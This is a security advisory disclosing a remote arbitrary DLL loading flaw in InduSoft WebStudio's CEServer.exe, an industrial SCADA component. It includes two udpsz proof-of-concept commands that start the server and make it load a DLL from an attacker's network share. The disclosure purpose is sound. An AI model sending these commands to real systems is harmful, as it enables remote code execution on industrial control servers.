####################################################################### Luigi Auriemma Application: InduSoft WebStudio http://www.indusoft.com Versions: <= 7.0 (Oct 2010) Platforms: Windows Bug: arbitrary dll loading in CEServer.exe Exploitation: remote, versus server Date: probably found 15 Oct 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "InduSoft is HMI SCADA software for developing applications in industrial, Instrumentation and Embedded Systems" ####################################################################### ====== 2) Bug ====== CEServer.exe is the remote agent server running on port 4322 and "Studio Manager.exe" is the main server component. The protocol is constituited by an 8 bit opcode (from 0x01 to 0x39) followed by the data. The opcode 0x31 is followed by a string containing the name of the DLL that will be loaded in real-time by Studio Manager. So an attacker can execute remote code by providing the name of a custom dll residing on his shared folder or alternatively on a local disk created through the directory traversal vulnerabilities of the other advisories. Note that doesn't matter if Studio Manager is running or not because it can be started remotely through the opcode 0x07. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -C 07 -T SERVER 4322 -1 udpsz -c "1\\\\myhost\\myshare\\name_of_the_dll_to_load_without_DLL_extension\0" -T SERVER 4322 -1 ####################################################################### ====== 4) Fix ====== http://www.zerodayinitiative.com/advisories/ZDI-11-330/ #######################################################################